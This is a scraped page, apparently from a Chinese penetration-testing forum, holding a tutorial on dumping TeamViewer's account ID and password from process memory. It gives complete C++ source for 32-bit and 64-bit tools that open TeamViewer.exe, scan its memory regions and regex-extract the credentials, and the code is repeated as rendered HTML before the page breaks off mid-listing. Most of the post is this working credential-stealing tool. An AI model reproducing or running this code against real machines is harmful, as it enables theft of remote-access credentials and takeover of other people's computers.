swing{20%{-webkit-transform:rotate(15deg);transform:rotate(15deg)}40%{-webkit-transform:rotate(-10deg);transform:rotate(-10deg)}60%{-webkit-transform:rotate(5deg);transform:rotate(5deg)}80%{-webkit-transform:rotate(-5deg);transform:rotate(-5deg)}to{-webkit-transform:rotate(0deg);transform:rotate(0deg)}}@keyframes swing{20%{-webkit-transform:rotate(15deg);transform:rotate(15deg)}40%{-webkit-transform:rotate(-10deg);transform:rotate(-10deg)}60%{-webkit-transform:rotate(5deg);transform:rotate(5deg)}80%{-webkit-transform:rotate(-5deg);transform:rotate(-5deg)}to{-webkit-transform:rotate(0deg);transform:rotate(0deg)}}</style><style>@-webkit-keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:transl
<body>
<div class="global-nav mb-50">
<nav class="navbar navbar-inverse navbar-fixed-top">
<div class="container nav">
<div class="visible-xs header-response sf-hidden">
</div>
<div class="row hidden-xs">
<div class="col-sm-8 col-md-8 col-lg-8">
<div class=navbar-header>
<button type=button class="navbar-toggle collapsed sf-hidden" data-toggle=collapse data-target=#global-navbar>
</button>
<div class=logo><a class="navbar-brand logo" href=https://forum.butian.net/></a></div>
</div>
<div class="collapse navbar-collapse" id=global-navbar>
<ul class="nav navbar-nav">
<li><a href=https://forum.butian.net/>首页 <span class=sr-only>(current)</span></a></li>
<li><a href=https://forum.butian.net/questions>问答</a></li>
<li><a href=https://forum.butian.net/shop>商城</a></li>
<li><a href=https://forum.butian.net/community>实战攻防技术</a></li>
<li><a href=https://forum.butian.net/movable>活动</a></li>
<li><a href=https://forum.butian.net/questions/Play>摸鱼办</a>
</li>
</ul>
<form role=search id=top-search-form action=https://forum.butian.net/search method=GET class="navbar-form hidden-sm hidden-xs pull-right">
<span class="btn btn-link"><span class=sr-only>搜索</span><span class="glyphicon glyphicon-search"></span></span>
<input type=text name=word id=searchBox class=form-control placeholder value>
</form>
</div>
</div>
</div>
</div>
</nav>
</div>
<div class="top-alert mt-60 clearfix text-center">
<!--[if lt IE 9]>
<div class="alert alert-danger topframe" role="alert">你的浏览器实在<strong>太太太太太太旧了</strong>,放学别走,升级完浏览器再说
<a target="_blank" class="alert-link" href="http://browsehappy.com">立即升级</a>
</div>
<![endif]-->
</div>
<div class=wrap>
<div class=container>
<div class="row mt-10">
<div class="col-xs-12 col-md-9 main" style=width:100%>
<div class=widget-article>
<h3 class="title word-wrap">Dump内存得到TeamViewer账号密码</h3>
<ul class=taglist-inline>
<li class=tagPopup><a class=tag href=https://forum.butian.net/topic/47>渗透测试</a></li>
</ul>
<div class="content mt-10">
<div class="quote mb-20">
最近看到用窗体得到TV的账号密码在最新版不能用了
于是就想写个工具实现一下通过内存得到账号密码
## 0x01 通过CE搜索账号密码存在的内存块
类型设置为文本选择unicode编码多搜...
</div>
<textarea id=md_view_content style=display:none>最近看到用窗体得到TV的账号密码在最新版不能用了
于是就想写个工具实现一下通过内存得到账号密码
0x01 通过CE搜索账号密码存在的内存块
---------------------
类型设置为文本选择unicode编码多搜索几次找到这个值
![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-cee5b5cfc809e9f79b87b64752845f48a5532f8f.png)
本来想的是应该有个指针直接指向密码,想把这个指针的基址找到就可以了,但是调了一下好像找不到这个基址
还有ID是不可以修改的定位也不方便想到遍历内存来得到ID和密码
再用CE搜索一下ID
![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-6552de03131cbd86064ecbc8fca2beb682cbd2c5.png)
可以看到在密码的附近都是有很多ID
用的是遍历可以不用知道具体的位置剩下的就是要思考怎么让遍历的内存更准确遍历0000000-7FFF0000肯定是可以的但是这样会出现很多误报因为后面是准备使用正则匹配的难免会匹配到别的字符串
先用x32dbg查看下内存的属性
![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-1449684b22d5daa6542c28d2264e009f0225eb9a.png)
从CE上看ID和密码就在这块内存里面这里有个特征就是这块内存的大小是1FF000后面会用到
那么思路就是先得到进程的基址然后遍历所有内存块基址找到一个1FF000大小的内存遍历内部内容得到ID密码这样遍历的内存也不会很大也可以降低匹配误差
0x02 需要用到的函数和结构
---------------
下面介绍一下需要用到的函数和结构
### ZwQueryVirtualMemory
```c++
typedef NTSTATUS(WINAPI* fnZwQueryVirtualMemory) (
HANDLE ProcessHandle, //进程句柄
PVOID BaseAddress, //内存地址
MEMORY_INFORMATION_CLASS MemoryInformationClass, //选择需要的内存信息,下面介绍
PVOID MemoryInformation, //指向MEMORY_BASIC_INFORMATION结构的指针
SIZE_T MemoryInformationLength, //MEMORY_BASIC_INFORMATION结构的大小
PSIZE_T ReturnLength //返回结构的大小
);
```
这个函数就是获取内存块的属性然后存放到MEMORY\_BASIC\_INFORMATION结构
### MemoryInformationClass
```c++
typedef enum _MEMORY_INFORMATION_CLASS {
MemoryBasicInformation,
MemoryWorkingSetList,
MemorySectionName,
MemoryBasicVlmInformation
} MEMORY_INFORMATION_CLASS;
```
这是一个枚举类型选择需要什么内存信息这里需要遍历内存选择MemoryBasicInformation就可以
### MEMORY\_BASIC\_INFORMATION
```c++
typedef struct _MEMORY_BASIC_INFORMATION {
PVOID BaseAddress; //内存块的起始地址
PVOID AllocationBase; //指向VirtualAlloc函数等开辟的内存的地址的指针
DWORD AllocationProtect;
//内存块的初始属性,打个比方开了一块内存赋予RW属性就算后面用VirtualProtect修改为RWX这里也是RW是这个内存初始时候的属性
#if defined (_WIN64)
WORD PartitionId; //不知道msdn没写
#endif
SIZE_T RegionSize; //内存块的大小
DWORD State; //内存块的状态
DWORD Protect; //内存块当前的属性
DWORD Type; //内存块的类型
} MEMORY_BASIC_INFORMATION, *PMEMORY_BASIC_INFORMATION;
```
### EnumProcessModules
```c++
BOOL WINAPI EnumProcessModules(
_In_ HANDLE hProcess, //进程的句柄
_Out_writes_bytes_(cb) HMODULE* lphModule, //存放模块的数组
_In_ DWORD cb, //数组的大小
_Out_ LPDWORD lpcbNeeded //所有模块的存储在lphModule中的字节数
);
```
这个函数主要是用来找到进程的基地址
![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-2a9584014afb1340703a79533e15539186eac410.png)
可以看到进程的基地址是偏向上面的,只要往下遍历就好
0x03 实现过程
---------
1. EnumProcessModules得到进程的基地址
2. 用do...while循环配合ZwQueryVirtualMemory得到内存块属性如果不是1FF000就加上内存块的大小跳到下一个内存块如果是的话直接得到模块的基地址然后遍历这个模块的内存
3. 用ReadProcessMemory将内存读出来
4. 用正则表达式加特征匹配内存中的字符
关于最后一点的特征光知道大小只能定位模块还需要知道一些ID密码附近的内存特征
发现ID的前面会有个0x80后面会用0x000x00结尾
密码前面有0x88用0x000x00结尾
还有一个坑点就是unicode的正则表达式匹配没找到特别好的方法
还好这里都是英文和数字只要取出13579位置的值然后放入一个char类型的数组中就可以用正则匹配了
如下
```php
35 00 72 00 6A 00 32 00 61 00 6D 00 35 00 61 00
5rj2am5a unicode
取出1 3 5 7 9 11 13 15存入char类型的数组就可以用正则了
```
0x04 代码实现 x32
-------------
```c++
#include&lt;stdio.h&gt;
#include&lt;Windows.h&gt;
#include &lt;dbghelp.h&gt;
#pragma comment(lib,"dbghelp.lib")
#include &lt;shlwapi.h&gt;
#include "tlhelp32.h"
#include &lt;psapi.h&gt;
#include &lt;regex&gt;
#if _WIN64
_int64 EndAddress = 0x0007FFFFFFFF0000;
#else
int EndAddress = 0X7FFF0000;
#endif //根据位数不同遍历的地址大小不同
using namespace std;
typedef enum _MEMORY_INFORMATION_CLASS {
MemoryBasicInformation,
MemoryWorkingSetList,
MemorySectionName,
MemoryBasicVlmInformation
} MEMORY_INFORMATION_CLASS;
typedef NTSTATUS(WINAPI* fnZwQueryVirtualMemory) (
HANDLE ProcessHandle,
PVOID BaseAddress,
MEMORY_INFORMATION_CLASS MemoryInformationClass,
PVOID MemoryInformation,
SIZE_T MemoryInformationLength,
PSIZE_T ReturnLength
);
int GetPidByName(PCWCHAR procName) {
HANDLE ProcessId = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
if (ProcessId == NULL) {
printf("Fail");
}
PROCESSENTRY32 te32 = { 0 };
te32.dwSize = sizeof(te32);
int number = 0;
if (Process32First(ProcessId, &amp;te32)) {
do {
if (!lstrcmp(te32.szExeFile, procName)) {
//printf("[+] TeamViewer PID: %d", te32.th32ProcessID);
return te32.th32ProcessID;
}
} while (Process32Next(ProcessId, &amp;te32));
}
} //用进程名得到PID
int main() {
MEMORY_BASIC_INFORMATION mbi = { 0 }; //初始化MEMORY_BASIC_INFORMATION结构
fnZwQueryVirtualMemory ZwQueryVirtualMemory = (fnZwQueryVirtualMemory)GetProcAddress(GetModuleHandleA("ntdll.dll"), "ZwQueryVirtualMemory");
//ndtll.dll得到ZwQueryVirtualMemory
if (ZwQueryVirtualMemory == NULL) {
if (ZwQueryVirtualMemory == NULL)
{
printf("没有找到ZwQueryVirtualMemory函数");
system("pause");
return 0;
}
}
//如果为NULL就是没找到
DWORD cbNeeded; //EnumProcessModules参数
HMODULE pModuleIds[1024]; //EnumProcessModules存放模块的数组
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, 0, GetPidByName(L"TeamViewer.exe"));
//TeamViewer.exe进程句柄
EnumProcessModules(hProcess, pModuleIds, sizeof(pModuleIds), &amp;cbNeeded);
int StartAddress = (int)pModuleIds[0];
printf("[+]PEBaseAddress: %p\n", StartAddress); //找到TeamViewer.exe基地址
do {
ZwQueryVirtualMemory(hProcess, (LPVOID)StartAddress, MemoryBasicInformation, &amp;mbi, sizeof(mbi), NULL); //从基地址开始遍历将内存信息存放MEMORY_BASIC_INFORMATION结构
if (mbi.RegionSize == 0x1FF000) { //查看内存大小是否为1FF000
int id_temp = 0; //临时变量找到了就改为1避免重复读取
char password_temp = 0; //同上
printf("[+]BaseAddress: %p\n", mbi.BaseAddress); //模块基地址
for (int i = 0; i &lt; 0x1FF000; i++) {
char id[0x17]; //存放id的char数组因为是unicode字符所以要双倍大小加上前面的0x80和后面的0x000x00
char id_char[0xA] = {0}; //unicode转换为ASCII存放的数组
char password[0x15]; //存放密码的unicode数组加上前面的0x88和后面的0x000x00
char password_char[0x9] = {0}; //同上
ReadProcessMemory(hProcess, (LPVOID)((int)mbi.BaseAddress + i), password, 0x15, NULL);
ReadProcessMemory(hProcess, (LPVOID)((int)mbi.BaseAddress + i), id, 0x17, NULL);
//内存中读出数据
for (int x = 0; x &lt;= 0x8; x++) {
password_char[x] = password[ x * 2 + 2 ];
}
//将0x00去除写入password_char数组
password_char[8] = '\x00'; //最后加上\x00结尾
if (password[1] == 0xffffff88 &amp;&amp; password[17] == 0 &amp;&amp; password[18] == 0 &amp;&amp; regex_match(password_char, regex("[0-9a-z]{8}"))) {
printf("[+]password: %s\n", password_char);
password_temp = 1;
}
//判断password[1]是否为0x8817,18位是否为00最后正则匹配password_char
for (int x = 0; x &lt;= 0x9; x++) {
id_char[x] = password[x * 2 + 2];
}
//同上
id_char[9] = '\x00';
if (id_temp == 0 &amp;&amp; id[1] == 0xffffff80 &amp;&amp; id[19] == 0 &amp;&amp; id[20] == 0 &amp;&amp; regex_match(id_char, regex("[0-9]{9}"))) {
printf("[+]id: %s\n", id_char);
id_temp = 1;
}
//这里和上面差不多id_temp == 0 是因为ID会出现多个相同的值所以只要取到一次就不用再取了
if (id_temp == 1 &amp;&amp; password_temp == 1) {
break;
}
//如果id_temp和password_temp都为1说明已经都取到了就可以跳出循环了
}
break;
}
StartAddress += mbi.RegionSize; //不是就加上当前内存块大小继续遍历
} while (StartAddress &lt;= EndAddress);
}
```
![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-077be43d4d69a3a8cefc456749787b9d146c0dbb.png)
0x05 代码实现 x64
-------------
64位中线程的内存地址都比进程基址小了就是存有ID密码的内存都到进程上面了
![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-89ff731e0adcb4e3d75c02646a7e26cf394b0a4d.png)
都是7FFE0000开始这样就不用先得到进程基址可以直接遍历
还有在64位中密码开头的数字变成了0x90这也是需要改下的别的基本都是相同的
![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-d13085f352250d13f0003fc20797e800545d7f1f.png)
贴一下修改后的代码
```c++
#include&lt;stdio.h&gt;
#include&lt;Windows.h&gt;
#include &lt;dbghelp.h&gt;
#pragma comment(lib,"dbghelp.lib")
#include &lt;shlwapi.h&gt;
#include "tlhelp32.h"
#include &lt;psapi.h&gt;
#include &lt;regex&gt;
#if _WIN64
_int64 EndAddress = 0x0007FFFFFFFF0000;
#else
int EndAddress = 0X7FFF0000;
#endif //根据位数不同遍历的地址大小不同
using namespace std;
typedef enum _MEMORY_INFORMATION_CLASS {
MemoryBasicInformation,
MemoryWorkingSetList,
MemorySectionName,
MemoryBasicVlmInformation
} MEMORY_INFORMATION_CLASS;
typedef NTSTATUS(WINAPI* fnZwQueryVirtualMemory) (
HANDLE ProcessHandle,
PVOID BaseAddress,
MEMORY_INFORMATION_CLASS MemoryInformationClass,
PVOID MemoryInformation,
SIZE_T MemoryInformationLength,
PSIZE_T ReturnLength
);
int GetPidByName(PCWCHAR procName) {
HANDLE ProcessId = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
if (ProcessId == NULL) {
printf("Fail");
}
PROCESSENTRY32 te32 = { 0 };
te32.dwSize = sizeof(te32);
int number = 0;
if (Process32First(ProcessId, &amp;te32)) {
do {
if (!lstrcmp(te32.szExeFile, procName)) {
printf("[+]TeamViewer PID: %d\n", te32.th32ProcessID);
return te32.th32ProcessID;
}
} while (Process32Next(ProcessId, &amp;te32));
}
} //用进程名得到PID
int main() {
MEMORY_BASIC_INFORMATION mbi = { 0 }; //初始化MEMORY_BASIC_INFORMATION结构
fnZwQueryVirtualMemory ZwQueryVirtualMemory = (fnZwQueryVirtualMemory)GetProcAddress(GetModuleHandleA("ntdll.dll"), "ZwQueryVirtualMemory");
//ndtll.dll得到ZwQueryVirtualMemory
if (ZwQueryVirtualMemory == NULL) {
if (ZwQueryVirtualMemory == NULL)
{
printf("没有找到ZwQueryVirtualMemory函数");
system("pause");
return 0;
}
}
//如果为NULL就是没找到
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, 0, GetPidByName(L"TeamViewer.exe"));
_int64 StartAddress = 0x000000007FFE0000;
do {
ZwQueryVirtualMemory(hProcess, (LPVOID)StartAddress, MemoryBasicInformation, &amp;mbi, sizeof(mbi), NULL); //从基地址开始遍历将内存信息存放MEMORY_BASIC_INFORMATION结构
if (mbi.RegionSize == 0x1FF000) { //查看内存大小是否为1FF000
int id_temp = 0; //临时变量找到了就改为1避免重复读取
char password_temp = 0; //同上
for (int i = 0; i &lt; 0x1FF000; i++) {
char id[0x17]; //存放id的char数组因为是unicode字符所以要双倍大小加上前面的0x80和后面的0x000x00
char id_char[0xA] = { 0 }; //unicode转换为ASCII存放的数组
char password[0x15]; //存放密码的unicode数组加上前面的0x88和后面的0x000x00
char password_char[0x9] = { 0 }; //同上
ReadProcessMemory(hProcess, (LPVOID)((_int64)mbi.BaseAddress + i), password, 0x15, NULL);
ReadProcessMemory(hProcess, (LPVOID)((_int64)mbi.BaseAddress + i), id, 0x17, NULL);
//内存中读出数据
for (int x = 0; x &lt;= 0x8; x++) {
password_char[x] = password[x * 2 + 2];
}
//将0x00去除写入password_char数组
password_char[8] = '\x00'; //最后加上\x00结尾
if (password[1] == 0xffffff90 &amp;&amp; password[17] == 0 &amp;&amp; password[18] == 0 &amp;&amp; regex_match(password_char, regex("[0-9a-z]{8}"))) {
printf("[+]password: %s\n", password_char);
password_temp = 1;
}
//判断password[1]是否为0x8817,18位是否为00最后正则匹配password_char
for (int x = 0; x &lt;= 0x9; x++) {
id_char[x] = password[x * 2 + 2];
}
//同上
id_char[9] = '\x00';
if (id_temp == 0 &amp;&amp; id[0] == 0x20 &amp;&amp; id[19] == 0 &amp;&amp; id[20] == 0 &amp;&amp; regex_match(id_char, regex("[0-9]{9}"))) {
printf("[+]id: %s\n", id_char);
id_temp = 1;
}
//这里和上面差不多id_temp == 0 是因为ID会出现多个相同的值所以只要取到一次就不用再取了
if (id_temp == 1 &amp;&amp; password_temp == 1) {
break;
}
//如果id_temp和password_temp都为1说明已经都取到了就可以跳出循环了
}
break;
}
StartAddress += mbi.RegionSize; //不是就加上当前内存块大小继续遍历
} while (0 &lt;= StartAddress);
}
```
![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-a79774acd10b864f1a97ca934c521143fabe3b85.png)</textarea>
<div id=layer-photos-demo>
<div id=md_view><div class=markdown-body><p blockindex=0>最近看到用窗体得到TV的账号密码在最新版不能用了</p>
<p blockindex=1>于是就想写个工具实现一下通过内存得到账号密码</p>
<h2 blockindex=2>0x01 通过CE搜索账号密码存在的内存块</h2>
<p blockindex=3>类型设置为文本选择unicode编码多搜索几次找到这个值</p>
<p blockindex=4><img src=
<p blockindex=5>本来想的是应该有个指针直接指向密码,想把这个指针的基址找到就可以了,但是调了一下好像找不到这个基址</p>
<p blockindex=6>还有ID是不可以修改的定位也不方便想到遍历内存来得到ID和密码</p>
<p blockindex=7>再用CE搜索一下ID</p>
<p blockindex=8><img src=
<p blockindex=9>可以看到在密码的附近都是有很多ID</p>
<p blockindex=10>用的是遍历可以不用知道具体的位置剩下的就是要思考怎么让遍历的内存更准确遍历0000000-7FFF0000肯定是可以的但是这样会出现很多误报因为后面是准备使用正则匹配的难免会匹配到别的字符串</p>
<p blockindex=11>先用x32dbg查看下内存的属性</p>
<p blockindex=12><img src="
<p blockindex=13>从CE上看ID和密码就在这块内存里面这里有个特征就是这块内存的大小是1FF000后面会用到</p>
<p blockindex=14>那么思路就是先得到进程的基址然后遍历所有内存块基址找到一个1FF000大小的内存遍历内部内容得到ID密码这样遍历的内存也不会很大也可以降低匹配误差</p>
<h2 blockindex=15>0x02 需要用到的函数和结构</h2>
<p blockindex=16>下面介绍一下需要用到的函数和结构</p>
<h3 blockindex=17>ZwQueryVirtualMemory</h3>
<pre blockindex=18><code class="hljs language-c++"><span class=hljs-function><span class=hljs-keyword>typedef</span> <span class=hljs-title>NTSTATUS</span><span class=hljs-params>(WINAPI* fnZwQueryVirtualMemory)</span> <span class=hljs-params>(
HANDLE ProcessHandle, <span class=hljs-comment>//进程句柄</span>
PVOID BaseAddress, <span class=hljs-comment>//内存地址</span>
MEMORY_INFORMATION_CLASS MemoryInformationClass, <span class=hljs-comment>//选择需要的内存信息,下面介绍</span>
PVOID MemoryInformation, <span class=hljs-comment>//指向MEMORY_BASIC_INFORMATION结构的指针</span>
SIZE_T MemoryInformationLength, <span class=hljs-comment>//MEMORY_BASIC_INFORMATION结构的大小</span>
PSIZE_T ReturnLength <span class=hljs-comment>//返回结构的大小</span>
)</span></span>;
</code></pre>
<p blockindex=19>这个函数就是获取内存块的属性然后存放到MEMORY_BASIC_INFORMATION结构</p>
<h3 blockindex=20>MemoryInformationClass</h3>
<pre blockindex=21><code class="hljs language-c++"><span class=hljs-keyword>typedef</span> <span class=hljs-class><span class=hljs-keyword>enum</span> _<span class=hljs-title>MEMORY_INFORMATION_CLASS</span> {</span>
MemoryBasicInformation,
MemoryWorkingSetList,
MemorySectionName,
MemoryBasicVlmInformation
} MEMORY_INFORMATION_CLASS;
</code></pre>
<p blockindex=22>这是一个枚举类型选择需要什么内存信息这里需要遍历内存选择MemoryBasicInformation就可以</p>
<h3 blockindex=23>MEMORY_BASIC_INFORMATION</h3>
<pre blockindex=24><code class="hljs language-c++"><span class=hljs-keyword>typedef</span> <span class=hljs-class><span class=hljs-keyword>struct</span> _<span class=hljs-title>MEMORY_BASIC_INFORMATION</span> {</span>
PVOID BaseAddress; <span class=hljs-comment>//内存块的起始地址</span>
PVOID AllocationBase; <span class=hljs-comment>//指向VirtualAlloc函数等开辟的内存的地址的指针</span>
DWORD AllocationProtect;
<span class=hljs-comment>//内存块的初始属性,打个比方开了一块内存赋予RW属性就算后面用VirtualProtect修改为RWX这里也是RW是这个内存初始时候的属性</span>
<span class=hljs-meta>#<span class=hljs-meta-keyword>if</span> defined (_WIN64)</span>
WORD PartitionId; <span class=hljs-comment>//不知道msdn没写</span>
<span class=hljs-meta>#<span class=hljs-meta-keyword>endif</span></span>
SIZE_T RegionSize; <span class=hljs-comment>//内存块的大小</span>
DWORD State; <span class=hljs-comment>//内存块的状态</span>
DWORD Protect; <span class=hljs-comment>//内存块当前的属性</span>
DWORD Type; <span class=hljs-comment>//内存块的类型</span>
} MEMORY_BASIC_INFORMATION, *PMEMORY_BASIC_INFORMATION;
</code></pre>
<h3 blockindex=25>EnumProcessModules</h3>
<pre blockindex=26><code class="hljs language-c++"><span class=hljs-function>BOOL WINAPI <span class=hljs-title>EnumProcessModules</span><span class=hljs-params>(
_In_ HANDLE hProcess, <span class=hljs-comment>//进程的句柄</span>
_Out_writes_bytes_(cb) HMODULE* lphModule, <span class=hljs-comment>//存放模块的数组</span>
_In_ DWORD cb, <span class=hljs-comment>//数组的大小</span>
_Out_ LPDWORD lpcbNeeded <span class=hljs-comment>//所有模块的存储在lphModule中的字节数</span>
)</span></span>;
</code></pre>
<p blockindex=27>这个函数主要是用来找到进程的基地址</p>
<p blockindex=28><img src="
<p blockindex=29>可以看到进程的基地址是偏向上面的,只要往下遍历就好</p>
<h2 blockindex=30>0x03 实现过程</h2>
<ol blockindex=31>
<li>EnumProcessModules得到进程的基地址</li>
<li>用do...while循环配合ZwQueryVirtualMemory得到内存块属性如果不是1FF000就加上内存块的大小跳到下一个内存块如果是的话直接得到模块的基地址然后遍历这个模块的内存</li>
<li>用ReadProcessMemory将内存读出来</li>
<li>用正则表达式加特征匹配内存中的字符</li>
</ol>
<p blockindex=32>关于最后一点的特征光知道大小只能定位模块还需要知道一些ID密码附近的内存特征</p>
<p blockindex=33>发现ID的前面会有个0x80后面会用0x000x00结尾</p>
<p blockindex=34>密码前面有0x88用0x000x00结尾</p>
<p blockindex=35>还有一个坑点就是unicode的正则表达式匹配没找到特别好的方法</p>
<p blockindex=36>还好这里都是英文和数字只要取出13579位置的值然后放入一个char类型的数组中就可以用正则匹配了</p>
<p blockindex=37>如下</p>
<pre blockindex=38><code class="hljs language-php"><span class=hljs-number>35</span> <span class=hljs-number>00</span> <span class=hljs-number>72</span> <span class=hljs-number>00</span> <span class=hljs-number>6</span>A <span class=hljs-number>00</span> <span class=hljs-number>32</span> <span class=hljs-number>00</span> <span class=hljs-number>61</span> <span class=hljs-number>00</span> <span class=hljs-number>6</span>D <span class=hljs-number>00</span> <span class=hljs-number>35</span> <span class=hljs-number>00</span> <span class=hljs-number>61</span> <span class=hljs-number>00</span>
<span class=hljs-number>5</span>rj2am5a unicode
取出<span class=hljs-number>1</span> <span class=hljs-number>3</span> <span class=hljs-number>5</span> <span class=hljs-number>7</span> <span class=hljs-number>9</span> <span class=hljs-number>11</span> <span class=hljs-number>13</span> <span class=hljs-number>15</span>存入char类型的数组就可以用正则了
</code></pre>
<h2 blockindex=39>0x04 代码实现 x32</h2>
<pre blockindex=40><code class="hljs language-c++"><span class=hljs-meta>#<span class=hljs-meta-keyword>include</span><span class=hljs-meta-string>&lt;stdio.h&gt;</span></span>
<span class=hljs-meta>#<span class=hljs-meta-keyword>include</span><span class=hljs-meta-string>&lt;Windows.h&gt;</span></span>
<span class=hljs-meta>#<span class=hljs-meta-keyword>include</span> <span class=hljs-meta-string>&lt;dbghelp.h&gt;</span></span>
<span class=hljs-meta>#<span class=hljs-meta-keyword>pragma</span> comment(lib,<span class=hljs-meta-string>"dbghelp.lib"</span>)</span>
<span class=hljs-meta>#<span class=hljs-meta-keyword>include</span> <span class=hljs-meta-string>&lt;shlwapi.h&gt;</span></span>
<span class=hljs-meta>#<span class=hljs-meta-keyword>include</span> <span class=hljs-meta-string>"tlhelp32.h"</span></span>
<span class=hljs-meta>#<span class=hljs-meta-keyword>include</span> <span class=hljs-meta-string>&lt;psapi.h&gt;</span></span>
<span class=hljs-meta>#<span class=hljs-meta-keyword>include</span> <span class=hljs-meta-string>&lt;regex&gt;</span></span>
<span class=hljs-meta>#<span class=hljs-meta-keyword>if</span> _WIN64</span>
_int64 EndAddress = <span class=hljs-number>0x0007FFFFFFFF0000</span>;
<span class=hljs-meta>#<span class=hljs-meta-keyword>else</span></span>
<span class=hljs-keyword>int</span> EndAddress = <span class=hljs-number>0X7FFF0000</span>;
<span class=hljs-meta>#<span class=hljs-meta-keyword>endif</span> <span class=hljs-comment>//根据位数不同遍历的地址大小不同</span></span>
<span class=hljs-keyword>using</span> <span class=hljs-keyword>namespace</span> std;
<span class=hljs-keyword>typedef</span> <span class=hljs-class><span class=hljs-keyword>enum</span> _<span class=hljs-title>MEMORY_INFORMATION_CLASS</span> {</span>
MemoryBasicInformation,
MemoryWorkingSetList,
MemorySectionName,
MemoryBasicVlmInformation
} MEMORY_INFORMATION_CLASS;
<span class=hljs-function><span class=hljs-keyword>typedef</span> <span class=hljs-title>NTSTATUS</span><span class=hljs-params>(WINAPI* fnZwQueryVirtualMemory)</span> <span class=hljs-params>(
HANDLE ProcessHandle,
PVOID BaseAddress,
MEMORY_INFORMATION_CLASS MemoryInformationClass,
PVOID MemoryInformation,
SIZE_T MemoryInformationLength,
PSIZE_T ReturnLength
)</span></span>;
<span class=hljs-function><span class=hljs-keyword>int</span> <span class=hljs-title>GetPidByName</span><span class=hljs-params>(PCWCHAR procName)</span> </span>{
HANDLE ProcessId = <span class=hljs-built_in>CreateToolhelp32Snapshot</span>(TH32CS_SNAPPROCESS, <span class=hljs-literal>NULL</span>);
<span class=hljs-keyword>if</span> (ProcessId == <span class=hljs-literal>NULL</span>) {
<span class=hljs-built_in>printf</span>(<span class=hljs-string>"Fail"</span>);
}
PROCESSENTRY32 te32 = { <span class=hljs-number>0</span> };
te32.dwSize = <span class=hljs-built_in><span class=hljs-keyword>sizeof</span></span>(te32);
<span class=hljs-keyword>int</span> number = <span class=hljs-number>0</span>;
<span class=hljs-keyword>if</span> (<span class=hljs-built_in>Process32First</span>(ProcessId, &amp;te32)) {
<span class=hljs-keyword>do</span> {
<span class=hljs-keyword>if</span> (!<span class=hljs-built_in>lstrcmp</span>(te32.szExeFile, procName)) {
<span class=hljs-comment>//printf("[+] TeamViewer PID: %d", te32.th32ProcessID);</span>
<span class=hljs-keyword>return</span> te32.th32ProcessID;
}
} <span class=hljs-keyword>while</span> (<span class=hljs-built_in>Process32Next</span>(ProcessId, &amp;te32));
}
} <span class=hljs-comment>//用进程名得到PID</span>
<span class=hljs-function><span class=hljs-keyword>int</span> <span class=hljs-title>main</span><span class=hljs-params>()</span> </span>{
MEMORY_BASIC_INFORMATION mbi = { <span class=hljs-number>0</span> }; <span class=hljs-comment>//初始化MEMORY_BASIC_INFORMATION结构</span>
fnZwQueryVirtualMemory ZwQueryVirtualMemory = (fnZwQueryVirtualMemory)<span class=hljs-built_in>GetProcAddress</span>(<span class=hljs-built_in>GetModuleHandleA</span>(<span class=hljs-string>"ntdll.dll"</span>), <span class=hljs-string>"ZwQueryVirtualMemory"</span>);
<span class=hljs-comment>//ndtll.dll得到ZwQueryVirtualMemory</span>
<span class=hljs-keyword>if</span> (ZwQueryVirtualMemory == <span class=hljs-literal>NULL</span>) {
<span class=hljs-keyword>if</span> (ZwQueryVirtualMemory == <span class=hljs-literal>NULL</span>)
{
<span class=hljs-built_in>printf</span>(<span class=hljs-string>"没有找到ZwQueryVirtualMemory函数"</span>);
<span class=hljs-built_in>system</span>(<span class=hljs-string>"pause"</span>);
<span class=hljs-keyword>return</span> <span class=hljs-number>0</span>;
}
}
<span class=hljs-comment>//如果为NULL就是没找到</span>
DWORD cbNeeded; <span class=hljs-comment>//EnumProcessModules参数</span>
HMODULE pModuleIds[<span class=hljs-number>1024</span>]; <span class=hljs-comment>//EnumProcessModules存放模块的数组</span>
HANDLE hProcess = <span class=hljs-built_in>OpenProcess</span>(PROCESS_ALL_ACCESS, <span class=hljs-number>0</span>, <span class=hljs-built_in>GetPidByName</span>(<span class=hljs-string>L"TeamViewer.exe"</span>));
<span class=hljs-comment>//TeamViewer.exe进程句柄</span>
<span class=hljs-built_in>EnumProcessModules</span>(hProcess, pModuleIds, <span class=hljs-built_in><span class=hljs-keyword>sizeof</span></span>(pModuleIds), &amp;cbNeeded);
<span class=hljs-keyword>int</span> StartAddress = (<span class=hljs-keyword>int</span>)pModuleIds[<span class=hljs-number>0</span>];
<span class=hljs-built_in>printf</span>(<span class=hljs-string>"[+]PEBaseAddress: %p\n"</span>, StartAddress); <span class=hljs-comment>//找到TeamViewer.exe基地址</span>
<span class=hljs-keyword>do</span> {
<span class=hljs-built_in>ZwQueryVirtualMemory</span>(hProcess, (LPVOID)StartAddress, MemoryBasicInformation, &amp;mbi, <span class=hljs-built_in><span class=hljs-keyword>sizeof</span></span>(mbi), <span class=hljs-literal>NULL</span>); <span class=hljs-comment>//从基地址开始遍历将内存信息存放MEMORY_BASIC_INFORMATION结构</span>
<span class=hljs-keyword>if</span> (mbi.RegionSize == <span class=hljs-number>0x1FF000</span>) { <span class=hljs-comment>//查看内存大小是否为1FF000</span>
<span class=hljs-keyword>int</span> id_temp = <span class=hljs-number>0</span>; <span class=hljs-comment>//临时变量找到了就改为1避免重复读取</span>
<span class=hljs-keyword>char</span> password_temp = <span class=hljs-number>0</span>; <span class=hljs-comment>//同上</span>
<span class=hljs-built_in>printf</span>(<span class=hljs-string>"[+]BaseAddress: %p\n"</span>, mbi.BaseAddress); <span class=hljs-comment>//模块基地址</span>
<span class=hljs-keyword>for</span> (<span class=hljs-keyword>int</span> i = <span class=hljs-number>0</span>; i &lt; <span class=hljs-number>0x1FF000</span>; i++) {
